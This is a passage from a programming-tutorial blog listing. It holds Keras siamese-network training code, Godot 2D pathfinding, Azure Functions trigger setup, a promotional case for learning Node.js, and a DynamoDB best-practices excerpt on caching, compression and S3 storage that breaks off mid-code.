Input(shape=input_dim) base_network = build_base_network(input_dim) feat_vecs_a = base_network(img_a) feat_vecs_b = base_network(img_b) feat_vecs_a and feat_vecs_b are the feature vectors of our image pair. Next, we feed these feature vectors to the energy function to compute the distance between them, and we use Euclidean distance as our energy function: def euclidean_distance(vects): x, y = vects return K.sqrt(K.sum(K.square(x - y), axis=1, keepdims=True)) def eucl_dist_output_shape(shapes): shape1, shape2 = shapes return (shape1[0], 1) distance = Lambda(euclidean_distance, output_shape=eucl_dist_output_shape)([feat_vecs_a, feat_vecs_b]) Now, we set the epoch length to 13, and we use the RMS prop for optimization and define our model: epochs = 13 rms = RMSprop() model = Model(input=[input_a, input_b], output=distance) Next, we define our loss function as the contrastive_loss function and compile the model: def contrastive_loss(y_true, y_pred): margin = 1 return K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0))) model.compile(loss=contrastive_loss, optimizer=rms) Now, we train our model: img_1 = x_train[:, 0] img_2 = x_train[:, 1] model.fit([img_1, img_2], y_train, validation_split=.25, batch_size=128, verbose=2, nb_epoch=epochs) You can see how the loss decreases over epochs: Train on 11250 samples, validate on 3750 samples Epoch 1/13 - 60s - loss: 0.2179 - val_loss: 0.2156 Epoch 2/13 - 53s - loss: 0.1520 - val_loss: 0.2102 Epoch 3/13 - 53s - loss: 0.1190 - val_loss: 0.1545 Epoch 4/13 - 55s - loss: 0.0959 - val_loss: 0.1705 Epoch 5/13 - 52s - loss: 0.0801 - val_loss: 0.1181 Epoch 6/13 - 52s - loss: 0.0684 - val_loss: 0.0821 Epoch 7/13 - 52s - loss: 0.0591 - val_loss: 0.0762 Epoch 8/13 - 52s - loss: 0.0526 - val_loss: 0.0655 Epoch 9/13 - 52s - loss: 0.0475 - val_loss: 0.0662 Epoch 10/13 - 52s - loss: 0.0444 - val_loss: 0.0469 Epoch 11/13 - 52s - loss: 0.0408 - val_loss: 0.0478 Epoch 12/13 - 52s - loss: 0.0381 - val_loss: 0.0498 Epoch 13/13 - 54s - loss: 0.0356 - val_loss: 0.0363 Now, we make predictions with test data: pred = model.predict([x_test[:, 0], x_test[:, 1]]) Next, we define a function for computing accuracy: def compute_accuracy(predictions, labels): return labels[predictions.ravel() < 0.5].mean() Now, we compute the accuracy of model: compute_accuracy(pred, y_test) 0.9779092702169625 In this tutorial, we have learned to build face recognition models using siamese networks. The architecture of siamese networks, basically consists of two identical neural networks both having the same weights and architecture and the output of these networks is plugged into some energy function to understand the similarity. To learn more about meta-learning with Python, check out the book Hands-On Meta-Learning with Python. What is Meta-Learning? Introducing Open AI’s Reptile: The latest scalable meta-learning Algorithm on the block “Deep meta reinforcement learning will be the future of AI where we will be so close to achieving artificial general intelligence (AGI)”, Sudharsan Ravichandiran
Read more
  • 0
  • 0
  • 14834

article-image-how-create-2d-navigation-godot-engine-0
George Marques
18 Nov 2016
6 min read
Save for later

How to Create 2D Navigation with the Godot Engine

George Marques
18 Nov 2016
6 min read
The Godot Engine has built-in functionalities that makes it easy to create navigation in the game world. This post will cover how to make an object follow a fixed path and how to go between two points avoiding the obstacles in the way. Following a fixed path Godot has a couple of nodes that help you create a path that can be followed by another node. One use of this is to make an NPC follow a fixed path in the map. Assuming you have a new project, create a Path2D node. You can then use the controls on the toolbar to make a curve representing the path you will need to follow. Curve buttons After adding the points and adjusting the curves, you will have something like the following: Path curve Now you need to add a PathFollow2D node as a child of Path2D. This will do the actual movement based on the Offset property. Then add an AnimationPlayer node as child of the PathFollow2D. Create a new animation in the player. Set the length to five seconds. Add a keyframe on the start with value 0 for the Unit Offset property of PathFollow2D. You can do that by clicking on the key icon next to the property in the Inspector dock. Then go to the end of the animation and add a frame with the value of 1. This will make Unit Offset go from 0 to 1 in the period of the animation (five seconds in this case). Set the animation to loop and autoplay. To see the effect in practice, add a Sprite node as child of PathFollow2D. You can use the default Godot icon as the texture for it. Enable the Visible Navigation under the Debug Options menu (last button in the top center bar) to make it easier to see. Save the scene and play it to see the Godot robot run around the screen: Sprite following path That's it! Making an object follow a fixed path is quite easy with the built-in resources of Godot. Not even scripting is needed for this example. Navigation and Avoiding Obstacles Sometimes you don't have a fixed path to follow. It might change dynamically or your AI must determine the path and avoid the obstacles and walls that might be in the way. Don't worry because Godot will also help you in this regard. Create a new scene and add a Node2D as the root. Then add a Navigation2D as its child. This will be responsible for creating the paths for you. You now need to add a NavigationPolygonInstance node as child of the Navigation2D. This will hold the polygon used for navigation, to determine what the passable areas are. To create the polygon itself, click on the pencil button on the toolbar (it will appear only if the NavigationPolygonInstance node is selected). The first time you try to add a point, the editor will warn you that there's no NavigationPolygon resource and will offer you to create one. Click on the Create button and all will be set. Navitation resource warning First you need to create the outer boundaries of the navigable area. The polygon can have as many points as you need, but it does need to be a closed polygon. Note that you can right-click on points to remove them and hold Ctrl while clicking on lines to add points. Once you finish the boundaries, click the pencil button again and create polygons inside it to make the impassable areas, such as the walls. You will end up with something like the following: Navigation polygon Add a Sprite node as child of the root Node2D and set the texture of it (you can use the default Godot icon). This will be the object navigating through the space. Now add the following script to the root node. The most important detail here is the get_simple_path function, which returns a list of points to travel from start to end without passing through the walls. extends Node2D # Global variables var start = Vector2() var end = Vector2() var path = [] var speed = 1 var transition = 0 var path_points = 0 func _ready(): # Enable the processing of user input set_process_input(true) # Enable the general process callback set_process(true) func _input(event): # If the user press a mouse button if event.type == InputEvent.MOUSE_BUTTON and event.pressed: if event.button_index == BUTTON_LEFT: # If it's the left button, set the starting point start = event.global_pos elif event.button_index == BUTTON_RIGHT: # If it's the right button, set the ending point end = event.global_pos # Reset the sprite position get_node("Sprite").set_global_pos(start) transition = 0 func _process(delta): # Get the list of points that compose the path path = get_node("Navigation2D").get_simple_path(start, end) # If the path has less points than it did before, reset the transition point if path.size() < path_points: transition = 0 # Update the current amount of points path_points = path.size() # If there's less than 2 points, nothing can be done if path_points < 2: return var sprite = get_node("Sprite") # This uses the linear interpolation function from Vector2 to move the sprite in a constant # rate through the points of the path. Transition is a value from 0 to 1 to be used as a ratio. sprite.set_global_pos(sprite.get_global_pos().linear_interpolate(path[1], transition)) start = sprite.get_global_pos() transition += speed * delta # Reset the transition when it gets to the point. if transition > 1: transition = 0 # Update the node so the _draw() function is called update() func _draw(): # This draw a white circle with radius of 10px for each point in the path for p in path: draw_circle(p, 10, Color(1, 1, 1)) Enable the Visible Navigation in the Debug Options button to help you visualize the effect. Save and run the scene. You can then left-click somewhere to define a starting point, and right-click to define the ending point. The points will be marked as white circles and the Sprite will follow the path, clearing the intermediate points as it travels along. Navigating Godot bot Conclusion The Godot Engine has many features to ease the development of all kinds of games. The navigation functions have many utilities in top-down games, be it an RPG or an RTS. Tilesets also embed navigation polygons that can be used in a similar fashion. About the Author: George Marques is a Brazilian software developer who has been playing with programming in a variety of environments since he was a kid. He works as a freelancer programmer for web technologies based on open source solutions such as WordPress and Open Journal Systems. He's also one of the regular contributors of the Godot Engine, helping solving bugs and adding new features to the software, while also giving solutions to the community for the questions they have.
Read more
  • 0
  • 1
  • 14752

article-image-creating-triggers-in-azure-functions-tutorial
Bhagyashree R
26 Nov 2018
8 min read
Save for later

Creating triggers in Azure Functions [Tutorial]

Bhagyashree R
26 Nov 2018
8 min read
A trigger is an event or situation that causes something to start. This something can be some sort of processing of data or some other service that performs some action. Triggers are just a set of functions that get executed when some event gets fired. In Azure, we have different types of triggers, such as an implicit trigger, and we can also create a manual trigger. With, Azure Functions you can write code in response to a trigger in Azure. [box type="shadow" align="" class="" width=""]This article is taken from the book Learning Azure Functions by Manisha Yadav and Mitesh Soni. In this book, you will you learn the techniques of scaling your Azure functions and making the most of serverless architecture. [/box] In this article, we will see the common types of triggers and learn how to create a trigger with a very simple example. We will also learn about the HTTP trigger, event bus, and service bus. Common types of triggers Let's understand first how a trigger works and get acquainted with the different types of triggers available in Azure Functions. The architecture of a trigger and how it works is shown in the following figure: The preceding diagram shows the event that fires the trigger and once the trigger is fired, it runs the Azure Function associated with it. We need to note a very important point here: one function must have exactly one trigger; in other words, one function can't have multiple triggers. Now let's see the different types of trigger available in Azure: TimerTrigger: This trigger is called on a predefined schedule. We can set the time for execution of the Azure Function using this trigger. BlobTrigger: This trigger will get fired when a new or updated blob is detected. The blob contents are provided as input to the function. EventHubTrigger: This trigger is used for the application instrumentation, the user experience, workflow processing, and in the Internet of Things (IoT). This trigger will get fired when any events are delivered to an Azure event hub. HTTPTrigger: This trigger gets fired when the HTTP request comes. QueueTrigger: This trigger gets fired when any new messages come in an Azure Storage queue. Generic Webhook: This trigger gets fired when the Webhook HTTP requests come from any service that supports Webhooks. GitHub Webhook: This trigger is fired when an event occurs in your GitHub repositories. The GitHub repository supports events such as Branch created, Delete branch, Issue comment, and Commit comment. Service Bus trigger: This trigger is fired when a new message comes from a service bus queue or topic. Example of creating a simple scheduled trigger in Azure Consider a simple example where we have to display a "good morning" message on screen every day in the morning at 8 AM. This situation is related to time so we need to use a schedule trigger. We will look at this type of trigger later in this article. Let's first start creating a function with the schedule trigger first: Log in to the Azure Portal. Click on the top left + icon | Compute | Function App: Once we click on Function App, the next screen will appear, where we have to provide a unique function App name, Subscription, Resource Group, Hosting Plan, Location, Storage, and then click on the Create button: Once we click on the Create button, Azure will start to deploy this function. Once this function is deployed, it will be seen in Notifications, as shown in the following screenshot: Click on Notifications and check the Functions details and add the trigger: To add a trigger in this function, click on the + icon next to Functions and then click on Custom function: Now we have to select Language and type the name of the trigger. Once we provide the name and trigger value it will provide the available template for us after filtering all the templates: Scroll down and type the trigger name and schedule. The Schedule value is a six-field CRON expression. Click on the Create button: By providing 0 0/5 * * * *, the function will run every 5 minutes from the first run. Once we click on the Create button, we will see the template code on the screen as follows: Here, we have to write code. Whatever action we want to perform, we have to write it here. Now write the code and click on the Save and run button. Once we run the code, we can see the output in the logs, as shown in the following screenshot: Note the timing. It runs at an interval of 5 minutes. Now we want it to run only once a day at 8 AM. To do this, we have to change the value of the schedule. To edit the value in the trigger, click on Integrate, type the value, and then click on the Save button: Now, again, click on goodMorningTriggerJS, modify the code, and test it. So, this is all about creating a simple trigger with the Azure Function. Now, we will look at the different types of triggers available in Azure. HTTP trigger The HTTP trigger is normally used to create the API or services, where we request for data using the HTTP protocol and get the response. We can also integrate the HTTP trigger with a Webhook. Let's start creating the HTTP trigger. We have already created a simple Azure Function and trigger. Now we will create the HTTP Login API. In this, we will send the login credential through an HTTP post request and get the response as to whether the user is valid or not. Since we have already created a Function app in the previous example, we can now add multiple functions to it: Click on +, select HttpTrigger-JavaScript, provide the function name, and click on the Create button: After we click on the Create button, the default template will be available. Now, we can edit and test the function: Now edit the code as follows: Save and run the code, as shown in the following screenshot: The login service is ready. Now let's check this service in Postman. To get the URL from the function, click on Get function URL: We will use Postman to check our service. Postman is a Chrome extension for API developers to test APIs. To add the Chrome extension, go to Settings in Chrome and select More tools | Extensions, as shown in the following screenshot: Click on Get more extensions: Now search for postman and then click on + ADD TO CHROME: Click on Add app: Launch the Postman app. Click on Sign Up with Google: The Postman window will look like this: Once the initial setup is done, test the API. Copy the function URL and paste it in Postman. Select the method type POST and provide a request body and click on the Send button: If we provide the correct username and password in the request body, we will get the response, user is valid; otherwise, the response will be invalid user. In the next section, we will discuss event hubs. Event hubs Event hubs are created to help us with the challenge of handling a huge amount of event-based messaging. The idea is that if we have apps or devices that publish a large amount of events in a very short duration (for example, a real-time voting system), then event hubs can be the place where we can send the event. Event hubs will create a stream of all the events which can be processed at some point in different ways. An event hub trigger is used to respond to an event sent to an event hub event stream. The following diagram shows how a trigger works with an Event Hub: Service bus The service bus is used to provide interaction between services or applications run in the cloud with other services or applications. The service bus trigger is used to give the response to messages which come from the service bus queue or topic. We have two types of service bus triggers: Service bus queue trigger: A queue is basically for first-in-first-out messages. When a message comes from the service bus, the service bus queue trigger gets fired and the Azure Function is called. In the Azure Function, we can process the message and then deliver it. Service bus topic trigger: The topic is useful for scaling to very large numbers of recipients. Finally, we have completed the trigger part of the Azure Function. In this article, we have discussed the architecture of a trigger and how the trigger works. We have covered different types of triggers available in Azure. We created one simple example of a schedule trigger and discussed the workflow of the schedule trigger. We discussed the HTTP trigger in detail and how the HTTP trigger works. Then we created an API using the HTTP trigger. We covered the event hub, service bus. We also covered how a trigger works with these services. If you found this post useful, do check out the book, Learning Azure Functions. This book walks you through the techniques of scaling your Azure functions and will help you make the most of serverless architecture. Anatomy of an Azure function App [Tutorial] Implementing Identity Security in Microsoft Azure [Tutorial] Azure Functions 2.0 launches with better workload support for serverless
Read more
  • 0
  • 0
  • 14745

article-image-5-reasons-you-should-learn-node-js
Richard Gall
22 Feb 2019
7 min read
Save for later

5 reasons you should learn Node.js

Richard Gall
22 Feb 2019
7 min read
Open source software in general, and JavaScript in particular, can seem like a place where boom and bust is the rule of law: rapid growth before everyone moves on to the next big thing. But Node.js is different. Although it certainly couldn’t be described as new, and it's growth hasn't been dramatic by any measure, over the last few years it has managed to push itself forward as one of the most widely used JavaScript tools on the planet. Do you want to learn Node.js? Popularity, however can only tell you so much. The key question, if you’re reading this, is whether you should learn Node.js. So, to help you decide if it’s time to learn the JavaScript library, here’s a list of the biggest reasons why you should start learning Node.js... Learn everything you need to know about Node.js with Packt's Node.js Complete Reference Guide Book Learning Path. Node.js lets you write JavaScript on both client and server Okay, let’s get the obvious one out of the way first: Node.js is worth learning because it allows you to write JavaScript on the server. This has arguably transformed the way we think about JavaScript. Whereas in the past it was a language specifically written on the client, backed by the likes of PHP and Java, it’s now a language that you can use across your application. Read next: The top 5 reasons Node.js could topple Java This is important because it means teams can work much more efficiently together. Using different languages for backend and frontend is typically a major source of friction. Unless you have very good polyglot developers, a team is restricted to their core skills, while tooling is also more inflexible. If you’re using JavaScript across the stack, it’s easier to use a consistent toolchain. From a personal perspective, learning Node.js is a great starting point for full stack development. In essence, it's like an add-on that immediately expands what you can do with JavaScript. In terms of your career, then, it could well make you an invaluable asset to a development team. Read next: How is Node.js changing web development? Node.js allows you to build complex and powerful applications without writing complex code Another strong argument for Node.js is that it is built for performance. This is because of 2 important things - Node.js' asynchronous-driven architecture, and the fact that it uses the V8 JavaScript engine. The significance of this is that V8 is one of the fastest implementations of JavaScript, used to power many of Google’s immensely popular in-browser products (like Gmail). Node.js is powerful because it employs an asynchronous paradigm for handling data between client and server. To clarify what this means, it’s worth comparing to the typical application server model that uses blocking I/O - in this instance, the application has to handle each request sequentially, suspending threads until they can be processed. This can add complexity to an application and, of course, slows an application down. In contrast, Node.js allows you to use non-blocking I/O in which threads (in this case sequential, not concurrent), which can manage multiple requests. If one can’t be processed, it’s effectively ‘withheld’ as a promise, which means it can be executed later without holding up other threads. This means Node.js can help you build applications of considerable complexity without adding to the complexity of your code. Node.js is well suited to building microservices Microservices have become a rapidly growing architectural style that offer increased agility and flexibility over the traditional monolith. The advantages of microservices are well documented, and whether or not they’re right for you now, it’s likely that they’re going to dominate the software landscape as the world moves away from monolithic architecture. This fact only serves to strengthen the argument that you should learn Node.js because the library is so well suited to developing in this manner. This is because it encourages you to develop in a modular and focused manner, quite literally using specific modules to develop an application. This is distinct and almost at odds with the monolithic approach to software architecture. At this point, it’s probably worth highlighting that it’s incredibly easy to package and publish the modules you build thanks to npm (node package manager). So, even if you haven’t yet worked with microservices, learning Node.js is a good way to prepare yourself for a future where they are going to become even more prevalent. Node.js can be used for more than just web development We know by now that Node.js is flexible. But it’s important to recognise that its flexibility means it can be used for a wide range of different purposes. Yes, the library's community are predominantly building applications for the web, but it’s also a useful tool for those working in ops or infrastructure. This is because Node.js is a great tool for developing other development tools. If you’re someone working to support a team of developers, or, indeed, to help manage an entire distributed software infrastructure, it could be vital in empowering you to get creative and build your own support tools. Even more surprisingly, Node.js can be used in some IoT projects. As this post from 2016 suggests, the two things might not be quite such strange bedfellows. Node.js is a robust project that won't be going anywhere As I’ve already said, in the JavaScript world frameworks and tools can appear and disappear quickly. That means deciding what to learn, and, indeed, what to integrate into your stack, can feel like a bit of a gamble. However, you can be sure that Node.js is here to stay. There are a number of reasons for this. For starters, there’s no other tool that brings JavaScript to the server. But more than that, with Google betting heavily on V8 - which is, as we’ve seen, such an important part of the project - you can be sure it’s only going to go from strength to strength. It’s also worth pointing out that Node.js went through a small crisis when io.js broke away from the main Node.js project. This feud was as much personal as it was technical, but with the rift healed, and the Node.js Foundation now managing the whole project, helping to ensure that the software is continually evolving with other relevant technological changes and that the needs of the developers who use it continue to be met. Conclusion: spend some time exploring Node.js before you begin using it at work That’s just 5 reasons why you should learn Node.js. You could find more, but broadly speaking these all underline its importance in today’s development world. If you’re still not convinced, there’s a caveat. If Node.js isn’t yet right for you, don’t assume that it’s going to fix any technological or cultural issues that have been causing you headaches. It probably won’t. In fact, you should probably tackle those challenges before deciding to use it. But that all being said, even if you don’t think it’s the right time to use Node.js professionally, that doesn’t mean it isn’t worth learning. As you can see, it’s well worth your time. Who knows where it might take you? Ready to begin learning? Purchase Node.js Complete Reference Guide or read it for free with a subscription free trial.
Read more
  • 0
  • 0
  • 14705
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at £15.99/month. Cancel anytime
article-image-dynamodb-best-practices
Packt
15 Sep 2015
24 min read
Save for later

DynamoDB Best Practices

Packt
15 Sep 2015
24 min read
 In this article by Tanmay Deshpande, the author of the book DynamoDB Cookbook, we will cover the following topics: Using a standalone cache for frequently accessed items Using the AWS ElastiCache for frequently accessed items Compressing large data before storing it in DynamoDB Using AWS S3 for storing large items Catching DynamoDB errors Performing auto-retries on DynamoDB errors Performing atomic transactions on DynamoDB tables Performing asynchronous requests to DynamoDB (For more resources related to this topic, see here.) Introduction We are going to talk about DynamoDB implementation best practices, which will help you improve the performance while reducing the operation cost. So let's get started. Using a standalone cache for frequently accessed items In this recipe, we will see how to use a standalone cache for frequently accessed items. Cache is a temporary data store, which will save the items in memory and will provide those from the memory itself instead of making a DynamoDB call. Make a note that this should be used for items, which you expect to not be changed frequently. Getting ready We will perform this recipe using Java libraries. So the prerequisite is that you should have performed recipes, which use the AWS SDK for Java. How to do it… Here, we will be using the AWS SDK for Java, so create a Maven project with the SDK dependency. Apart from the SDK, we will also be using one of the most widely used open source caches, that is, EhCache. To know about EhCache, refer to http://ehcache.org/. Let's use a standalone cache for frequently accessed items: To use EhCache, we need to include the following repository in pom.xml: <repositories> <repository> <id>sourceforge</id> <name>sourceforge</name> <url>https://oss.sonatype.org/content/repositories/ sourceforge-releases/</url> </repository> </repositories> We will also need to add the following dependency: <dependency> <groupId>net.sf.ehcache</groupId> <artifactId>ehcache</artifactId> <version>2.9.0</version> </dependency> Once the project setup is done, we will create a cachemanager class, which will be used in the following code: public class ProductCacheManager { // Ehcache cache manager CacheManager cacheManager = CacheManager.getInstance(); private Cache productCache; public Cache getProductCache() { return productCache; } //Create an instance of cache using cache manager public ProductCacheManager() { cacheManager.addCache("productCache"); this.productCache = cacheManager.getCache("productCache"); } public void shutdown() { cacheManager.shutdown(); } } Now, we will create another class where we will write a code to get the item from DynamoDB. Here, we will first initiate the ProductCacheManager: static ProductCacheManager cacheManager = new ProductCacheManager(); Next, we will write a method to get the item from DynamoDB. Before we fetch the data from DynamoDB, we will first check whether the item with the given key is available in cache. If it is available in cache, we will return it from cache itself. If the item is not found in cache, we will first fetch it from DynamoDB and immediately put it into cache. Once the item is cached, every time we need this item, we will get it from cache, unless the cached item is evicted: private static Item getItem(int id, String type) { Item product = null; if (cacheManager.getProductCache().isKeyInCache(id + ":" + type)) { Element prod = cacheManager.getProductCache().get(id + ":" + type); product = (Item) prod.getObjectValue(); System.out.println("Returning from Cache"); } else { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("product"); product = table.getItem(new PrimaryKey("id", id, "type", type)); cacheManager.getProductCache().put( new Element(id + ":" + type, product)); System.out.println("Making DynamoDB Call for getting the item"); } return product; } Now we can use this method whenever needed. Here is how we can test it: Item product = getItem(10, "book"); System.out.println("First call :Item: " + product); Item product1 = getItem(10, "book"); System.out.println("Second call :Item: " + product1); cacheManager.shutdown(); How it works… EhCache is one of the most popular standalone caches used in the industry. Here, we are using EhCache to store frequently accessed items from the product table. Cache keeps all its data in memory. Here, we will save every item against its keys that are cached. We have the product table, which has the composite hash and range keys, so we will also store the items against the key of (Hash Key and Range Key). Note that caching should be used for only those tables that expect lesser updates. It should only be used for the table, which holds static data. If at all anyone uses cache for not so static tables, then you will get stale data. You can also go to the next level and implement a time-based cache, which holds the data for a certain time, and after that, it clears the cache. We can also implement algorithms, such as Least Recently Used (LRU), First In First Out (FIFO), to make the cache more efficient. Here, we will make comparatively lesser calls to DynamoDB, and ultimately, save some cost for ourselves. Using AWS ElastiCache for frequently accessed items In this recipe, we will do the same thing that we did in the previous recipe. The only thing we will change is that we will use a cloud hosted distributed caching solution instead of saving it on the local standalone cache. ElastiCache is a hosted caching solution provided by Amazon Web Services. We have two options to select which caching technology you would need. One option is Memcached and another option is Redis. Depending upon your requirements, you can decide which one to use. Here are links that will help you with more information on the two options: http://memcached.org/ http://redis.io/ Getting ready To get started with this recipe, we will need to have an ElastiCache cluster launched. If you are not aware of how to do it, you can refer to http://aws.amazon.com/elasticache/. How to do it… Here, I am using the Memcached cluster. You can choose the size of the instance as you wish. We will need a Memcached client to access the cluster. Amazon has provided a compiled version of the Memcached client, which can be downloaded from https://github.com/amazonwebservices/aws-elasticache-cluster-client-memcached-for-java. Once the JAR download is complete, you can add it to your Java Project class path: To start with, we will need to get the configuration endpoint of the Memcached cluster that we launched. This configuration endpoint can be found on the AWS ElastiCache console itself. Here is how we can save the configuration endpoint and port: static String configEndpoint = "my-elastic- cache.mlvymb.cfg.usw2.cache.amazonaws.com"; static Integer clusterPort = 11211; Similarly, we can instantiate the Memcached client: static MemcachedClient client; static { try { client = new MemcachedClient(new InetSocketAddress(configEndpoint, clusterPort)); } catch (IOException e) { e.printStackTrace(); } } Now, we can write the getItem method as we did for the previous recipe. Here, we will first check whether the item is present in cache; if not, we will fetch it from DynamoDB, and put it into cache. If the same request comes the next time, we will return it from the cache itself. While putting the item into cache, we are also going to put the expiry time of the item. We are going to set it to 3,600 seconds; that is, after 1 hour, the key entry will be deleted automatically: private static Item getItem(int id, String type) { Item product = null; if (null != client.get(id + ":" + type)) { System.out.println("Returning from Cache"); return (Item) client.get(id + ":" + type); } else { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("product"); product = table.getItem(new PrimaryKey("id", id, "type", type)); System.out.println("Making DynamoDB Call for getting the item"); ElasticCache.client.add(id + ":" + type, 3600, product); } return product; } How it works… A distributed cache also works in the same fashion as the local one works. A standalone cache keeps the data in memory and returns it if it finds the key. In distributed cache, we have multiple nodes; here, keys are kept in a distributed manner. The distributed nature helps you divide the keys based on the hash value of the keys. So, when any request comes, it is redirected to a specified node and the value is returned from there. Note that ElastiCache will help you provide a faster retrieval of items at the additional cost of the ElastiCache cluster. Also note that the preceding code will work if you execute the application from the EC2 instance only. If you try to execute this on the local machine, you will get connection errors. Compressing large data before storing it in DynamoDB We are all aware of DynamoDB's storage limitations for the item's size. Suppose that we get into a situation where storing large attributes in an item is a must. In that case, it's always a good choice to compress these attributes, and then save them in DynamoDB. In this recipe, we are going to see how to compress large items before storing them. Getting ready To get started with this recipe, you should have your workstation ready with Eclipse or any other IDE of your choice. How to do it… There are numerous algorithms with which we can compress the large items, for example, GZIP, LZO, BZ2, and so on. Each algorithm has a trade-off between the compression time and rate. So, it's your choice whether to go with a faster algorithm or with an algorithm, which provides a higher compression rate. Consider a scenario in our e-commerce website, where we need to save the product reviews written by various users. For this, we created a ProductReviews table, where we will save the reviewer's name, its detailed product review, and the time when the review was submitted. Here, there are chances that the product review messages can be large, and it would not be a good idea to store them as they are. So, it is important to understand how to compress these messages before storing them. Let's see how to compress large data: First of all, we will write a method that accepts the string input and returns the compressed byte buffer. Here, we are using the GZIP algorithm for compressions. Java has a built-in support, so we don't need to use any third-party library for this: private static ByteBuffer compressString(String input) throws UnsupportedEncodingException, IOException { // Write the input as GZIP output stream using UTF-8 encoding ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPOutputStream os = new GZIPOutputStream(baos); os.write(input.getBytes("UTF-8")); os.finish(); byte[] compressedBytes = baos.toByteArray(); // Writing bytes to byte buffer ByteBuffer buffer = ByteBuffer.allocate(compressedBytes.length); buffer.put(compressedBytes, 0, compressedBytes.length); buffer.position(0); return buffer; } Now, we can simply use this method to store the data before saving it in DynamoDB. Here is an example of how to use this method in our code: private static void putReviewItem() throws UnsupportedEncodingException, IOException { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("ProductReviews"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 10)) .withString("reviewerName", "John White") .withString("dateTime", "20-06-2015T08:09:30") .withBinary("reviewMessage", compressString("My Review Message")); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } In a similar way, we can write a method that decompresses the data on retrieval from DynamoDB. Here is an example: private static String uncompressString(ByteBuffer input) throws IOException { byte[] bytes = input.array(); ByteArrayInputStream bais = new ByteArrayInputStream(bytes); ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPInputStream is = new GZIPInputStream(bais); int chunkSize = 1024; byte[] buffer = new byte[chunkSize]; int length = 0; while ((length = is.read(buffer, 0, chunkSize)) != -1) { baos.write(buffer, 0, length); } return new String(baos.toByteArray(), "UTF-8"); } How it works… Compressing data at client side has numerous advantages. Lesser size means lesser use of network and disk resources. Compression algorithms generally maintain a dictionary of words. While compressing, if they see the words getting repeated, then those words are replaced by their positions in the dictionary. In this way, the redundant data is eliminated and only their references are kept in the compressed string. While uncompressing the same data, the word references are replaced with the actual words, and we get our normal string back. Various compression algorithms contain various compression techniques. Therefore, the compression algorithm you choose will depend on your need. Using AWS S3 for storing large items Sometimes, we might get into a situation where storing data in a compressed format might not be sufficient enough. Consider a case where we might need to store large images or binaries that might exceed the DynamoDB's storage limitation per items. In this case, we can use AWS S3 to store such items and only save the S3 location in our DynamoDB table. AWS S3: Simple Storage Service allows us to store data in a cheaper and efficient manner. To know more about AWS S3, you can visit http://aws.amazon.com/s3/. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Consider a case in our e-commerce website where we would like to store the product images along with the product data. So, we will save the images on AWS S3, and only store their locations along with the product information in the product table: First of all, we will see how to store data in AWS S3. For this, we need to go to the AWS console, and create an S3 bucket. Here, I created a bucket called e-commerce-product-images, and inside this bucket, I created folders to store the images. For example, /phone/apple/iphone6. Now, let's write the code to upload the images to S3: private static void uploadFileToS3() { String bucketName = "e-commerce-product-images"; String keyName = "phone/apple/iphone6/iphone.jpg"; String uploadFileName = "C:\tmp\iphone.jpg"; // Create an instance of S3 client AmazonS3 s3client = new AmazonS3Client(new ProfileCredentialsProvider()); // Start the file uploading File file = new File(uploadFileName); s3client.putObject(new PutObjectRequest(bucketName, keyName, file)); } Once the file is uploaded, you can save its path in one of the attributes of the product table, as follows: private static void putItemWithS3Link() { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("productTable"); Map<String, String> features = new HashMap<String, String>(); features.put("camera", "13MP"); features.put("intMem", "16GB"); features.put("processor", "Dual-Core 1.4 GHz Cyclone (ARM v8-based)"); Set<String> imagesSet = new HashSet<String>(); imagesSet.add("https://s3-us-west-2.amazonaws.com/ e-commerce-product-images/phone/apple/iphone6/iphone.jpg"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 250, "type", "phone")) .withString("mnfr", "Apple").withNumber("stock", 15) .withString("name", "iPhone 6").withNumber("price", 45) .withMap("features", features) .withStringSet("productImages", imagesSet); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } So whenever required, we can fetch the item by its key, and fetch the actual images from S3 using the URL saved in the productImages attribute. How it works… AWS S3 provides storage services at very cheaper rates. It's like a flat data dumping ground where we can store any type of file. So, it's always a good option to store large datasets in S3 and only keep its URL references in DynamoDB attributes. The URL reference will be the connecting link between the DynamoDB item and the S3 file. If your file is too large to be sent in one S3 client call, you may want to explore its multipart API, which allows you to send the file in chunks. Catching DynamoDB errors Till now, we discussed how to perform various operations in DynamoDB. We saw how to use AWS provided by SDK and play around with DynamoDB items and attributes. Amazon claims that AWS provides high availability and reliability, which is quite true considering the years of experience I have been using their services, but we still cannot deny the possibility where services such as DynamoDB might not perform as expected. So, it's important to make sure that we have a proper error catching mechanism to ensure that the disaster recovery system is in place. In this recipe, we are going to see how to catch such errors. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Catching errors in DynamoDB is quite easy. Whenever we perform any operations, we need to put them in the try block. Along with it, we need to put a couple of catch blocks in order to catch the errors. Here, we will consider a simple operation to put an item into the DynamoDB table: try { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("productTable"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 10, "type", "mobile")) .withString("mnfr", "Samsung").withNumber("stock", 15) 